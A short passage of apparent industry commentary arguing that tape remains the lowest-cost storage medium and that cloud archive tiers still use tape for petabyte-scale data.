The industry consensus is that tapes will not stop being used any time soon. Tape storage is expected to continue to be the lowest cost storage option for the foreseeable future, and it is true that tape sales to hyperscale data libraries does continue with the same numbers as have been seen over the last decade and beyond.

With more data moving to the cloud all the time, cloud providers are going to need to offer even more competitive low-cost storage. The lowest cost archive tiers of storage offered by all the major cloud providers use some amount of tape storage, even if you’d guess they don’t. For data storage in the petabytes, there’s still a lot to be said for it.